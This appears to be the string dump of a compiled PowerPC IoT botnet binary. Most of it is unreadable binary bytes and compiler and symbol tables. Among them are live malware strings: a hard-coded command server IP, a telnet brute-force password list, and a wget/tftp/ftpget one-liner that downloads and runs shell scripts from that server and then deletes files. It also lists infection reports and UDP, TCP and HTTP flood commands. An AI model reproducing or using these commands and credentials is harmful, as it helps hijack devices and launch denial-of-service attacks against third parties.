78	y
=)<o8	
:} J
:} J
:} J
}a[xN
9@I^
:} J
Cx= 
}@Sx= 
}`HP= 
:} J
:} J
}a[xN
HP|	
HP|	
}a[xN
}a[xN
}a[xN
}a[xN
0} Z
>} KxT
9)<p
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
}a[xN
}a[xN
}a[xN
}%KxH
x}d[x}%KxK
}a[xN
:}#Kx8
8i<x= 
}a[xN
x}%KxH
x}$Kx8
}a[xN
}a[xN
:} J
}a[xN
}c[x|
}c[x|
}a[xN
}a[xN
}a[xN
x}$KxH
}%KxH
}a[xN
}%KxH
}a[xN
} HP
}a[xN
}%KxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
x}$Kx8
}a[xN
}a[xN
}%KxH
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
}a[xN
}%KxH
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
}a[xN
}c[x|
:} J
H0}k
}%Kx8
}g[xH
x}'KxH
}a[xN
:}ISx8	
}@SxT
}a[xN
}a[xN
} HP
} HP
} HP
} HP
} HP
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
{]|`
}a[xN
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}g[x|
}a[xN
4} HP
9)aXT
:} J
9)j(T
:} J
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}g[x|
}a[xN
;} HP
:} J
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}g[x|
}a[xN
} HP
:} J
:} J
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}g[x|
}a[xN
} HP
9)y\T
:} J
:} J
:} J
>p} 
p}`XP
} HP
>}CSx}
;x}g[x|
}a[xN
}a[xN
}a[xN
>} Kx|
}a[xN
}a[xN
}a[xN
}a[xN
}CSx|
x}e[xH
`=8`
}a[xN
}%KxH
_a|`
}%KxH
}a[xN
}%KxH
}#Kx8
:} J
x}$Kx8
:} J
H0}k
}%Kx8
}g[xH
}&Kx}g[xH
Nq|`
}c[x
:} J
:} J
}c[x
Q}|`
:} J
:} J
}c[x
:} J
:} J
}e[x}FSx|
:} J
:} J
A0}e[x}FSx|
Ma|`
}%KxH
:} J
:} J
:} J
:} J
AH}FSx}
x}i[xL
:} J
:} J
:} J
}FSx}
Cx}h[xL
x}%Kx8
}	|`
Ka|`
|=|`
w!|k
:} J
:} J
}e[x}FSx|
}c[x
}c[x|
r)|`
:} J
:} J
}e[x}FSx|
:} J
:} J
}e[x}FSx|
:} J
:} J
}e[x}FSx|
sy|`
}CSx}d[x|
v]8`
@i8`
pq|`
}%KxH
DU|i
}'Kx9
u}|`
x}e[x8
lq|`
>}c[x|
}'Kx9
k}|`
k=|`
>}c[x|
}a[xN
x!|`
8	Bx
B|= 
`a|i
`9|`
gY|`
8	B|}c[x|
>}c[x|
}'Kx9
}a[xN
x}e[x8
\=|`
aa|`
[u|`
[A|`
`!|`
>}c[x|
6i|i
}'Kx9
a=|`
>}c[x|
5i|`
}a[xN
o-|`
} HP
9)`$
:} J
x}$KxH
nq|`
} HP
9)`$
:} J
x}$KxH
}a[xN
} HP
9)`$
:} J
}i[x9`
#}#Kx|
x}e[xH
x}$KxH
l]|`
} HP
9)`$
:} J
}i[x9`
#}#Kx|
x}e[xH
x}$KxH
}a[xN
]9|`
05|`
}a[xN
S!|`
RI|`
o1|`
Q%|`
*)|`
n!|`
OE|`
}ESx}f[xL
lU|i
MY|`
j}|i
jY|i
j5|i
im|`
iQ|`
i5|`
ha)B@
P-|`
g=|i
fy|`
f)|`
M9|`
dQ|`
d1|`
Xa)B@
DY|`
aU|`
a9|`
Pa)B@
Hy|`
^%8`
Xe|`
} HP
9)`$
:} J
}i[x9`
#}#Kx|
x}e[xH
@}|`
]y|`
]]|`
E%|`
\M|`
\-|`
CE|`
=U|`
}a[xN
}%KxH
:} J
}c[x|
XA|`
IA|`
x}$Kx
}a[xN
AQ|`
Fi|`
x}%KxH
FY|`
;U|`
}%KxH
x}$KxH
}a[xN
}a[xN
8	Bx
75|`
8	Bx
65|`
}e[x}FSxL
x}$KxH
,Q|`
:}ISx8	
CI= 
3	|i
8	G<|
/q|`
/I|`
}%KxH
9)GX8
x}$Kx
nM= 
x}$KxK
B|}e[xL
}%KxH
+a8`
rA8`
2e|`
=Y|`
x}#Kx8
x}$KxH
1}|`
x}$Kx8
z9|`
}#Kx}e[x8
8U|}
:U|~
+x}%KxD
|cJ.Tc
E1=`
3x= 
H89)
 6})
Tc@.
?M= 
Tc@.
Tc@.
+x8a
+x|}
DA|`
}#Kx
8} J
W9)M
x8cM
>)|`
8})B
8})B
9iN$9+
})XP=`
p9kN$|kH
:}'R
}^Sx/
<|	:.
}^SxH
}KSx;@
}KSx
})XP/
}#Kx
}	Cx
God A red nugget A fat egg under a dog
\})@P/
}eXP= 
<9)M
}z[x9!
,)8a
+x||
*Y= 
xp	 
)U=`
#x9c
QJD.QJ
}H2x9k
}JZx9)
@x9#
}#KxN
}c[xN
}CSxN
} @9A
(P5%
}	CxH
}ISxH
}#Kx|j
}+Kx`
} 899+
}#Kx|j
}*Kx
N@|i
} HP;
3`= 
<})R
} HQ@
}#KxN
#x|h
@,|}
9)Z$Tc
}#H.}#KxN
,}+I
:}yZ
}#Kx8!
:} B
4}#Kx
H81 
 0})
 >})
}KSx
}KSx
}*HP
}#XP9)
}CSx
 }CSx}e[x
}CSx}e[x
}e[x}CSx
x}$Kx
9)Z8
}`XP+
:}iS
}+HPU)
:}#J
3x8!
akNm
9)09U)
}FSx}i
|`HQ@
$9iZ8+
$8cZ`8
<|	R.p	
:}`:
}a[xN
:} :
:} B
B@}c
} HP
}iXP
x8cZpL
#x|y
}iXP= 
:9)`
}iXP;
:9)`
+x8!
P} HP
|	 9@
@}l;
`P}l[x}
})0P})Z
<`C0
}h0P
})PP|
(}^"
@}fHP
}jXP
0}*XP
})XP|
L|	Z
}`(P
Jx=i~
})Zx|
Hy9#
}#KxN
}CSxN
}c[xN
Jx9C
})Zx9c
Hy9#
}#KxN
}c[xN
}CSxN
<|	:.p	
<}@Z
|	:.p	
@XPK
}8HP
^$8c^
x8c^(K
J.p	
Cx;`
 |	Z.p	
J.p	
x}g[x8`
+x|}
}$Kx
:})B
#x9@
})PP9I
}@PPq`
p}J(
|	 9@
Jx=i~
})Zx9c
Hy9#
}#KxN
}c[xN
}CSxN
}CSxN
x;)^p;
 6}<
D}#Kx
	^\8
}h[x9k
0}*+
} HP9)
(}h[xH
 }*+
} HP9)
} HP9)
D}#Kx
}i[x;
}<Kx
x}<Kx/
}#Kx
3xU)
}JCx9)
Sx})[x})
[x9|
;xU)@.})
	U)@.
^$8c^
;x}QSx
} HP
J.p	
J.p	
}DSx
x|}Z
}|[x:
173.208.205.2:777
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://173.208.205.2/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 173.208.205.2 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 173.208.205.2; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 173.208.205.2 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;exit
echo a
telnet
root
admin
1234
123456
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
busybox
GETFUCKED
(null)
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
:>%$#
%d.%d.%d.%d
gethostbyname
setsockopt
connect
173.208.205.2
GET bins.sh
TELNET LOGIN CRACKED - %s:%s:%s
unctelnet %s|%s|%s|23
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve
>%s.t && cd %s ; >retrieve
REPORT %s:%s:%s
INFECTION SUCCESS - %s:%s:%s
Telnet'd %s|%s|%s|23
FAILED TO INFECT - %s:%s:%s
8dts
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
wget -s -U "
" -q 
wget -O /tmp/yuagwduiagwdhg/a -U "
PONG!
TEST %s
SPOOF
KILLSUB
KILLSUB <sub version to kill>
KMS!
not killing myself cuz im not that version
TABLE
SCAN
SCAN <threads> <timeout>
STARTING SCANNER!
GETLOCALIP
My IP: %s
GETPUBLICIP
My Public IP: %s
VERSION
Version: %d.%d
RANGE
RANGE <option 0-idk>
Range %d->%d
DOUSPOOFBRAH?
FUK YEA I DO (%s)
UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
L7 <protocol ip url> <time> <threads> <sleep check> <sleep time(ms)>
mkdir /tmp/yuagwduiagwdhg
L420
rm -fr /tmp/yuagwduiagwdhg
VIEWPAGE
VIEWPAGE <http ip url>
Tacocat
CNC <target> <port> <time>
STD <target> <port> <time>
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
8.8.8.8
/proc/net/route
	00000000	
DANK
BUILD %s
/etc/rc.d/rc.local
/etc/rc.conf
"%s%s"
fork failed
BUILD %s
PONG
aparently im a dupe
%s 2>&1
%s%s%m
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
?/bin/sh
/dev/null
 Nnk(A 
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
S[kA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.sdata
.sbss
.bss
.comment
initfini.c
libc/sysdeps/linux/powerpc/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.3069
p.3067
__do_global_dtors_aux
call___do_global_dtors_aux
object.3150
frame_dummy
call_frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/powerpc/crtn.S
libc/sysdeps/linux/powerpc/crt1.S
client.c
i.4259
printchar
prints
printi
print
fdopen_pids
hextable
ipState
ioctl.c
libc/sysdeps/linux/powerpc/vfork.S
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
chdir.c
close.c
dup2.c
fork.c
getcwd.c
getdtablesize.c
getpagesize.c
getpid.c
getrlimit.c
kill.c
open.c
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
fclose.c
fopen.c
perror.c
printf.c
fprintf.c
snprintf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3862
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4073
prefix.4074
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4074
qual_chars.4079
spec_chars.4075
spec_ranges.4076
spec_or_mask.4077
spec_and_mask.4078
feof.c
fgets.c
fputs.c
fflush_unlocked.c
fgets_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strcat.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1128
_string_syserrmsgs.c
bcopy.c
strcasecmp.c
strcasestr.c
strtok.c
next_start.1106
isatty.c
tcgetattr.c
tcsetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2759
inet_ntoa.c
Eleele
buf.2641
inet_makeaddr.c
gethostbyname.c
h.4864
buf.4865
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
shutdown.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
initial_fa
free.c
realloc.c
heap_alloc.c
heap_alloc_at.c
heap_free.c
__heap_link_free_area
__heap_link_free_area_after
rand.c
random.c
mylock
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
usleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.2829
__syscall_error.c
__socketcall.c
execve.c
getegid.c
geteuid.c
getgid.c
getuid.c
nanosleep.c
sbrk.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc_unlocked.c
memmove.c
memchr.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
sigaction.c
abort.c
been_there_done_that
dl-support.c
libc/sysdeps/linux/powerpc/brk.S
__syscall_rt_sigaction.c
poll.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
strncat.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3080
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
raise.c
llseek.c
tolower.c
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
rangesA
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
Beeb
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
printf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
recv
connect
spoofTest
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
sigemptyset
getRandomPublicIPB
__pthread_mutex_lock
initConnection
__sigdelset
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_snprintf
__GI_vsnprintf
__GI_setsid
memmove
sendTCP
__bsd_signal
snprintf
__GI_strpbrk
__stdio_trans2r_o
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
rangesB2
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
A Santa lives evil at NASA
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
__heap_alloc_at
usleep
execve
infectedmessage
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
wildString
dupppp
__xpg_strerror_r
__heap_free
fcntl64
prctl
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
perror
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
feof
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
__malloc_heap_lock
gethostbyname_r
tcpcsum
reset_telstate
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
__malloc_heap
sigaddset
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
Do nine men interpret Nine men I nod
oldranges
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
__GI_fputs
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
sendHTTP2
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
strcat
__GI_brk
__GI_strcat
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__deregister_frame_info
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
tmpdirs
__stdin
stdin
__GI_isatty
strcasestr
_start
strstr
__GI_ioctl
init_rand
rand
getRandomPublicIP2
signal
read
__decode_header
_SDA_BASE_
getCores
__GI___h_errno_location
__GI_memcpy
strcoll
rangesC1
oldranges2
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
__GI_tcsetattr
realloc
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
__GI_poll
_vfprintf_internal
Degas are we not drawn onward no In union drawn onward to new eras aged
__GI_strcasestr
fork
__stdio_rfill
strncat
gotIP
__GI_sleep
sigaction
Borrow or rob
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
versionnnn
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
ourPublicIP
echoLoader
listFork
